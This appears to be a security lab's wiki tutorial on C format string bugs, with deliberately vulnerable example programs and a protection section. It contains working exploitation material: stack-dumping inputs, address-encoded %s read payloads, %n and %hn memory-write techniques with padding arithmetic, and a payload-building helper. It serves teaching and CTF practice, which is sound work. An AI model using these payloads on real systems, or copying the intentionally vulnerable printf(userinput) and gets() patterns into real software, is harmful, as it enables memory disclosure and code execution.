Format String Bug Introduction

From Embedded Lab Vienna for IoT & Security
Revision as of 11:46, 19 May 2020 by Ikramer (talk | contribs)

Description of Format String Vulnerability

A Format Function is an ANSI C conversion function such as `printf`, which converts a variable into a human-readable string representation. The Format String is the argument of the Format Function; it contains ASCII text and Format Parameters, such as:

 printf("Guess solution: %d\n", 42);

Here 42 is interpreted as a decimal number by the Format Function. The Format Parameter/Specifier (%d, %s, %p, %u, ...) defines the type of conversion that is applied to the corresponding argument.

Format Parameter/Specifier Table

| Parameter | Output | Passed as |
|---|---|---|
| %p | External representation of a pointer to void | Reference |
| %d | Decimal | Value |
| %c | Character | Value |
| %u | Unsigned decimal | Value |
| %x | Hexadecimal | Value |
| %s | String | Reference |
| %n | Writes the number of characters printed so far into a pointer | Reference |
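The table can be tried out with a small sketch. The function name `format_demo` and the sample values are made up for illustration; `snprintf` is used instead of `printf` only so that the result can be inspected as a string.

```c
#include <stddef.h>
#include <stdio.h>

/* Formats one sample value for each of %d, %u, %x, %c and %s into `out`.
   Returns the number of characters produced (excluding the final NUL). */
int format_demo(char *out, size_t size)
{
    return snprintf(out, size, "%d|%u|%x|%c|%s",
                    -42, 42u, 255u, 'A', "text");
}
```

With a sufficiently large buffer the result is `-42|42|ff|A|text`. `%p` is left out because its textual form is implementation-defined.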

In vulnerable code, the user input is passed directly to the function as `printf(userinput)` instead of being passed as an argument to a Format String that includes a Format Parameter, as in `printf("%s", userinput)`.

Vulnerable Format Functions Table

| Format function | Description |
|---|---|
| fprintf | Writes formatted output to a file |
| printf | Outputs a formatted string to stdout |
| sprintf | Prints into a string |
| snprintf | Prints into a string, checking the length |
| vfprintf | Prints a va_arg structure to a file |
| vprintf | Prints a va_arg structure to stdout |
| vsprintf | Prints a va_arg structure to a string |
| vsnprintf | Prints a va_arg structure to a string, checking the length |
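The `v...` variants are typically found inside wrapper functions, which are Format Functions themselves and inherit the same risk. The following is a minimal sketch; `log_format` and the `PRINTF_LIKE` macro are hypothetical names. The `format` attribute is a GCC/Clang extension that lets the compiler check calls to the wrapper like calls to `printf`; on other compilers the macro expands to nothing.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>

#if defined(__GNUC__)
#define PRINTF_LIKE(fmt_idx, arg_idx) \
    __attribute__((format(printf, fmt_idx, arg_idx)))
#else
#define PRINTF_LIKE(fmt_idx, arg_idx)
#endif

/* Hypothetical wrapper: argument 3 is the Format String,
   the variadic arguments start at position 4. */
int log_format(char *out, size_t size, const char *fmt, ...) PRINTF_LIKE(3, 4);

int log_format(char *out, size_t size, const char *fmt, ...)
{
    va_list args;
    int n;

    va_start(args, fmt);
    n = vsnprintf(out, size, fmt, args);  /* forwards the va_list unchanged */
    va_end(args);
    return n;
}
```

A call such as `log_format(buf, sizeof buf, userinput)` is just as vulnerable as `printf(userinput)`.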

History

The Format String Bug has been publicly known since at least September 1999[1]. It received major attention after the public release of exploit code against wu-ftpd 2.6.0 in June 2000[2].

Example - Read from the stack

The following program shows safe and vulnerable usage of a Format Function:

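   #include <stdio.h>

   int main(int argc, char **argv)
   {
       if (argc < 2)   // without an argument, argv[1] is NULL
           return 1;

       // This line is safe: the input is only data for %s
       printf("%s\n", argv[1]);

       // This line is vulnerable: the input is used as the Format String
       printf(argv[1]);

       return 0;
   }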

Execute with different arguments:

   ./example "%p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"
   ./example "%08x.%08x.%08x.%08x.%08x%08x.%08x.%08x.%08x.%08x"
   ./example "%s"

In the first call, the Format Function interprets the command line argument as a Format String with 15 pointer parameters. Because no corresponding arguments were passed, it prints the next 15 values it finds where the arguments would be, which means we are able to dump the stack.

What happens exactly?

  • Stack with correctly coded Format string

 printf("this is a %s, with a number %d, and address %08x", a, b, &c);

The stack grows towards lower addresses and is used in a LIFO manner; the arguments are pushed onto the stack in reverse order. The Format Function fetches a, b and &c from the stack and converts them into the string which is sent to stdout.

![](iVsbFmq.png)

  • Stack with missing variables

 printf(userinput);

With the input string "this is a %s, with a number %d, and address %08x" this evaluates to

 printf("this is a %s, with a number %d, and address %08x");

The variables a, b and &c are missing on the stack.

![](0elA6pt.png)

The Format Function fetches the next values from the stack even though they were never passed as arguments.
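Why the Format Function fetches values that were never passed can be illustrated with a strongly simplified model. `mini_format` is a hypothetical function written for this page, not how any real C library implements `printf`; it understands only `%d` and `%s`. The point is that the specifier alone decides when `va_arg` fetches the next argument; nothing tells the function how many arguments the caller really supplied.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>

/* Simplified model of a Format Function (only %d and %s).
   Returns the length of the string stored in `out`, or -1 if size is 0. */
int mini_format(char *out, size_t size, const char *fmt, ...)
{
    va_list args;
    size_t used = 0;

    if (size == 0)
        return -1;
    out[0] = '\0';

    va_start(args, fmt);
    for (const char *p = fmt; *p != '\0' && used + 1 < size; p++) {
        int n;
        if (p[0] == '%' && p[1] == 'd') {
            /* The specifier alone triggers fetching an int. */
            n = snprintf(out + used, size - used, "%d", va_arg(args, int));
            p++;
        } else if (p[0] == '%' && p[1] == 's') {
            /* %s fetches a pointer and dereferences it. */
            n = snprintf(out + used, size - used, "%s",
                         va_arg(args, const char *));
            p++;
        } else {
            n = snprintf(out + used, size - used, "%c", *p);
        }
        if (n < 0)
            break;
        used += (size_t)n;
        if (used >= size) {
            used = size - 1;   /* output was truncated */
            break;
        }
    }
    va_end(args);
    return (int)used;
}
```

Called as `mini_format(buf, sizeof buf, "a %s, number %d", "test", 5)` it produces `a test, number 5`. Called with the same Format String but without the two arguments, `va_arg` would still be executed twice and would read whatever happens to be in the argument area.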

If the source code is available, a Format String vulnerability can be recognized by checking every call to a Format Function and verifying that a Format String with the matching Format Specifiers is supplied. If only a binary is available, test it by simply inserting Format Specifiers such as `"%x %x %s"` as input.
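For testing a binary, longer probe strings are tedious to type. A minimal sketch of a generator follows; the function name `build_probe` and the `.%08x` layout are choices made here for illustration.

```c
#include <stddef.h>
#include <stdio.h>

/* Builds "<marker>.%08x.%08x..." with `count` specifiers.
   Returns the length of the probe, or -1 if `out` is too small. */
int build_probe(char *out, size_t size, const char *marker, int count)
{
    size_t used;
    int n = snprintf(out, size, "%s", marker);

    if (n < 0 || (size_t)n >= size)
        return -1;
    used = (size_t)n;

    for (int i = 0; i < count; i++) {
        /* "%%" emits a literal percent sign into the probe. */
        n = snprintf(out + used, size - used, ".%%08x");
        if (n < 0 || (size_t)n >= size - used)
            return -1;
        used += (size_t)n;
    }
    return (int)used;
}
```

`build_probe(buf, sizeof buf, "AAAA", 3)` yields `AAAA.%08x.%08x.%08x`, which can then be fed to the program under test.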


Arbitrary Read from the Stack

example2.c
```C
#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: gets() does not check the length and the
   user input is used as the Format String. */
void vuln() {
    printf("What's your name? ");
    char name[200];
    gets(name);
    printf("Nice to meet you, ");
    printf(strcat(name, "!\n"));
}

int main(int argc, char **argv) {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    vuln();
    return 0;
}
```
We can read arbitrary values from the stack with `"%<some number>$x"`: to read the first argument on the stack we use `%1$08x`, for the second `%2$08x`, and so on.
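The `<number>$` syntax is a POSIX extension for selecting arguments by position and is not part of ISO C, so it is not available in every C library. A harmless sketch with real arguments shows the mechanism; `positional_demo` is a made-up name.

```c
#include <stddef.h>
#include <stdio.h>

/* Selects the arguments by position instead of in order:
   %2$s takes the second argument, %1$s the first. */
int positional_demo(char *out, size_t size)
{
    return snprintf(out, size, "%2$s %1$s", "world", "hello");
}
```

On a POSIX system the buffer contains `hello world` afterwards. In an attack the same syntax jumps directly to the stack position of interest instead of stepping through all values before it.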

To get an idea of where we are reading, we can insert a recognizable marker followed by a series of `%08x` specifiers:
```bash
./example2
What's your name? AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
Nice to meet you, AAAA.5655f000.00000001.5655d64d.ffd4fbb8.f77595f0.f75bf00b.41414141.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78.252e7838.2e783830.78383025.3830252e.30252e78!
```
The position at which `41414141` appears tells us where the input buffer lies on the stack. In this output it is the 7th value, so the input buffer `name` starts at the 7th argument on the stack, which can be accessed directly with `AAAA.%7$08x`. The exact position depends on the compiler and build, so it has to be determined for each binary.
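Counting the fields by hand is error-prone. The following sketch automates it for dumps in the dot-separated layout used on this page; the function name `find_field_index` is hypothetical, and the parser assumes that the first field is the echoed marker and that the line ends with `!` or a newline.

```c
#include <string.h>

/* Returns the 1-based position of `needle` among the '.'-separated
   fields that follow the first field of `dump`, or 0 if it is absent. */
int find_field_index(const char *dump, const char *needle)
{
    size_t len = strlen(needle);
    int index = 0;
    const char *p = strchr(dump, '.');   /* skip the echoed marker text */

    while (p != NULL) {
        size_t field_len;

        p++;                             /* move past the separator */
        index++;
        field_len = strcspn(p, ".!\n");
        if (field_len == len && strncmp(p, needle, len) == 0)
            return index;
        p = strchr(p, '.');
    }
    return 0;
}
```

The returned index is the number to use in `%<index>$08x`.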

**Caution** - data on the stack is stored in little-endian byte order on little-endian machines such as x86. Test this by inserting

```bash
./example2
What's your name? ABCD.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x
Nice to meet you, ABCD.f18281a0.0000004f.ffffffaf.85571440.00000012.44434241.30252e78.2e783830.3830252e.252e7838.78383025.30252e78.2e783830.3830252e.252e7838!
```
The Format String with our input `ABCD...` is found on the stack starting at the 6th argument, `44434241` in little-endian order, which can be verified with `ABCD.%6$08x`.
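The byte order can be checked with a few lines of code. This sketch decodes four bytes the way a little-endian CPU does when it loads a 32-bit integer; `load_le32` is a name chosen for this example, and the explicit shifts make the result independent of the machine it runs on.

```c
#include <stdint.h>

/* Interprets p[0..3] as a 32-bit little-endian integer:
   the first byte in memory is the least significant one. */
uint32_t load_le32(const unsigned char *p)
{
    return (uint32_t)p[0]
         | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16)
         | ((uint32_t)p[3] << 24);
}
```

For the bytes `A B C D` (0x41 0x42 0x43 0x44) the function returns 0x44434241, which is exactly the value printed by `%08x` in the output above.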

Arbitrary Read from a Known Address

We would like to read memory at a known address. The previous examples showed that we control the content of the Format String, which itself lies on the stack. We therefore need a Format Parameter that takes an address from the stack (passed by reference) and displays the memory it points to: `%s`. We place the address we want to read at the start of the input and arrange for the 6th item on the stack, which is the start of our input in the run above, to be consumed by `%s`.
```C
/* address = 0x08480110 */
/* address encoded as a 32-bit little-endian string: "\x10\x01\x48\x08" */
printf("\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|");
```
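Such an input can be assembled programmatically. The sketch below is an assumption-laden variant: instead of five `%08x` specifiers as padding it uses direct parameter access (`%<index>$s`), and the name `build_read_payload` is made up. It only builds the bytes; it does not send them anywhere. An address containing a zero byte cannot be used this way, because the zero would terminate the string.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Writes the 4 address bytes in little-endian order, followed by
   "|%<index>$s|". Returns the total length, or -1 if `out` is too small. */
int build_read_payload(char *out, size_t size, uint32_t addr, int index)
{
    int n;

    if (size < 5)
        return -1;
    for (int i = 0; i < 4; i++)
        out[i] = (char)((addr >> (8 * i)) & 0xff);

    /* "%%" yields a literal '%', "%d" the index, "$s|" is copied as is. */
    n = snprintf(out + 4, size - 4, "|%%%d$s|", index);
    if (n < 0 || (size_t)n >= size - 4)
        return -1;
    return 4 + n;
}
```

For the address 0x08480110 and index 6 the payload consists of the bytes `\x10\x01\x48\x08` followed by `|%6$s|`.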

Test your skills with CH0_easyprintf

Write to the Stack with %n

The `%n` Format Parameter writes the number of bytes printed so far into a variable. The address of the variable is passed to the Format Function as an integer pointer argument on the stack.

File: example3
```C
int n_chars = 0;
printf("Hello, World%n is ", &n_chars);
printf("%d bytes long.\n", n_chars);
```
In the first printf call of example3, `%n` stores 12, the number of bytes in `Hello, World`, in the variable `n_chars`.

`%n` can be used to write to a specified address when that address is placed in the Format String:
```bash
"\xc0\xc8\xff\xbf_%08x.%08x.%08x.%08x.%08x.%n"
```

The next printf calls show how the value of n_chars can be controlled by padding the output to a chosen number of bytes.
```C
n_chars = 0;
printf("%10u%n ", 1, &n_chars);    // n_chars = 10
n_chars = 0;
printf("%150u%n ", 2, &n_chars);   // n_chars = 150
```
However, `%n` always stores a full 4-byte integer, and an address-sized value would require an impractically large character count. Therefore the target value is built up one byte at a time with several writes. Let us have a closer look at what happens, because each write still stores 4 bytes and therefore has side effects on neighbouring memory. An unsigned integer is stored in memory in 4 bytes in little-endian encoding, so a number like 0x0000014c is \x4c\x01\x00\x00 in memory.

File: example4
```C
unsigned char canary[5];
unsigned char foo[4];

memset(foo, 0, sizeof(foo));
/* 0: before */ strcpy((char *) canary, "AAAA");
/* 1 */ printf("%16u%n", 7350, (int *) &foo[0]);    // foo[0] = 0x10
/* 2 */ printf("%32u%n", 7350, (int *) &foo[1]);    // foo[1] = 0x20
/* 3 */ printf("%64u%n", 7350, (int *) &foo[2]);    // foo[2] = 0x40
/* 4 */ printf("%128u%n", 7350, (int *) &foo[3]);   // foo[3] = 0x80
/* 5: after */
printf("%02x%02x%02x%02x\n", foo[0], foo[1], foo[2], foo[3]);
printf("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]);
```
In step 0, foo is initialized with four `\x00` bytes, and the canary, the next variable on the stack, is set to 'AAAA', represented by `\x41\x41\x41\x41`. After the four bytewise write operations, foo contains 10204080 as expected, but 3 bytes of the canary have been overwritten: `\x00\x00\x00\x41` = 00000041. Figure 1 illustrates the behavior of the write operations.

![](dFhNHgl.png)
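The overlap shown in the figure can be reproduced deterministically with a small model. This sketch does not call `printf` at all: `store_count_le32` imitates what a single `%n` write does on a little-endian machine, and one 8-byte array stands in for `foo` followed directly by `canary`, which is an assumption about the stack layout. All names are made up for this example.

```c
#include <stdint.h>
#include <string.h>

/* Models one %n write: store `count` as a 4-byte little-endian
   integer starting at `dst`. */
static void store_count_le32(unsigned char *dst, uint32_t count)
{
    for (int i = 0; i < 4; i++)
        dst[i] = (unsigned char)((count >> (8 * i)) & 0xff);
}

/* mem[0..3] plays the role of foo, mem[4..7] the role of canary. */
void simulate_bytewise_writes(unsigned char mem[8])
{
    static const uint32_t counts[4] = { 16, 32, 64, 128 };

    memset(mem, 0, 4);            /* foo    = 00 00 00 00 */
    memcpy(mem + 4, "AAAA", 4);   /* canary = 41 41 41 41 */

    /* Each write targets &foo[i] but always covers 4 bytes,
       so the later writes spill into the canary. */
    for (int i = 0; i < 4; i++)
        store_count_le32(mem + i, counts[i]);
}
```

After the call the array holds `10 20 40 80 00 00 00 41`: foo has the intended value, and the first three canary bytes are zeroed by the upper bytes of the last writes.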

Multiple byte writes can also be performed in a single call, provided that the byte values are written in ascending order, because the character count only grows within one call.

File: example4
```C
strcpy((char *) canary, "AAAA");
printf("%16u%n%16u%n%32u%n%64u%n",
       1, (int *) &foo[0], 1, (int *) &foo[1],
       1, (int *) &foo[2], 1, (int *) &foo[3]);
printf("%02x%02x%02x%02x\n", foo[0], foo[1], foo[2], foo[3]);
printf("canary: %02x%02x%02x%02x\n", canary[0], canary[1], canary[2], canary[3]);
```
The output is again foo: 10204080 and canary: 00000041.
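The widths in such a combined call follow from the running character count. Since only the lowest byte of the count ends up in the targeted byte, a byte value smaller than the previous one can still be reached by letting the count run past the next multiple of 256. The helper below is a sketch of that arithmetic; `pad_for_byte` and its `min_pad` parameter (the smallest width the padded conversion can produce, at least 1 for `%u`) are names introduced here.

```c
/* Returns the field width needed so that the low byte of the running
   character count becomes `target`, given `written` characters so far. */
unsigned pad_for_byte(unsigned written, unsigned char target, unsigned min_pad)
{
    unsigned pad = ((unsigned)target - (written & 0xffu)) & 0xffu;

    while (pad < min_pad)
        pad += 256u;   /* wrap around: the low byte stays the same */
    return pad;
}
```

Starting at 0 and targeting 0x10, 0x20, 0x40 and 0x80 gives the widths 16, 16, 32 and 64 used in the call above. Targeting 0x10 after 128 characters gives 144, because 128 + 144 = 272 = 0x110.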

Write Short %hn

Instead of writing each byte separately, we can write short integers using the `%hn` format specifier. The advantage of `%hn` is that it stores only 2 bytes per write and therefore does not destroy data next to the targeted address, so this is the preferred method. Again we would like to write 10204080 into foo. In little-endian order, the bytes `10 20` form the short 0x2010 and the bytes `40 80` form the short 0x8040.

First padding value: 0x2010 = 8208
Second padding value: 0x8040 - 0x2010 = 32832 - 8208 = 24624

example5
```
printf("%.8208u%hn%.24624u%hn",
       1, (short int *) &foo[0],
       1, (short int *) &foo[2]);
```
Output: foo: 10204080 canary: 41414141
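The two padding values can be derived mechanically from the 32-bit value that should end up in memory. A minimal sketch, with the hypothetical name `hn_paddings`; it assumes a little-endian target, writes the low half first, and ignores edge cases such as a resulting padding of 0.

```c
#include <stdint.h>

/* Splits `value` into its low and high 16-bit halves and computes the
   padding for two consecutive %hn writes (low half first). */
void hn_paddings(uint32_t value, unsigned *first, unsigned *second)
{
    unsigned low  = value & 0xffffu;          /* stored at the lower address */
    unsigned high = (value >> 16) & 0xffffu;  /* stored 2 bytes further on   */

    *first  = low;
    /* %hn keeps only the low 16 bits of the count, so the difference
       is taken modulo 65536. */
    *second = (high - low) & 0xffffu;
}
```

The bytes `10 20 40 80` in memory correspond to the little-endian value 0x80402010, for which the function yields 8208 and 24624, the values used in example5.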


Test your skills with CH1_root_me2


Usage

  • Reading arbitrary locations (leak addresses or canaries)
  • Writing arbitrary locations
  • Executing arbitrary code (Overwrite Return, .GOT addresses)


Protection

  • Programmers should use the safe form of the call

Never pass user input directly to a Format Function without a Format Specifier.
```
printf("%s", userinputbuffer);
snprintf(buf, sizeof buf, "%s", userinputbuffer);
```

  • FormatGuard: Automatic Protection From printf Format String Vulnerabilities [3]
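The safe form can be wrapped in a small helper so that user input never reaches the Format String position. This is a sketch under the assumption that the input is a NUL-terminated string; `safe_echo` is a made-up name.

```c
#include <stddef.h>
#include <stdio.h>

/* Copies `user_input` into `out` as plain data. Any '%' characters in
   the input are printed literally and never interpreted. */
int safe_echo(char *out, size_t size, const char *user_input)
{
    return snprintf(out, size, "%s", user_input);
}
```

An input such as `%x.%x.%n` is reproduced unchanged. In addition, GCC and Clang can report calls like `printf(userinput)` at compile time when the warnings `-Wformat -Wformat-security` are enabled.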


Sources

Interesting CTF writeups

References

  1. Tymm Twillman, Exploit for proftpd 1.2.0pre6, BugTraq, 20-09-1999, https://seclists.org/bugtraq/1999/Sep/328 [accessed 05-21-2020].
  2. tf8, WuFTPD: Providing *remote* root since at least 1994, BugTraq, 22-06-2000, https://seclists.org/bugtraq/2000/Jun/297 [accessed 05-21-2020].
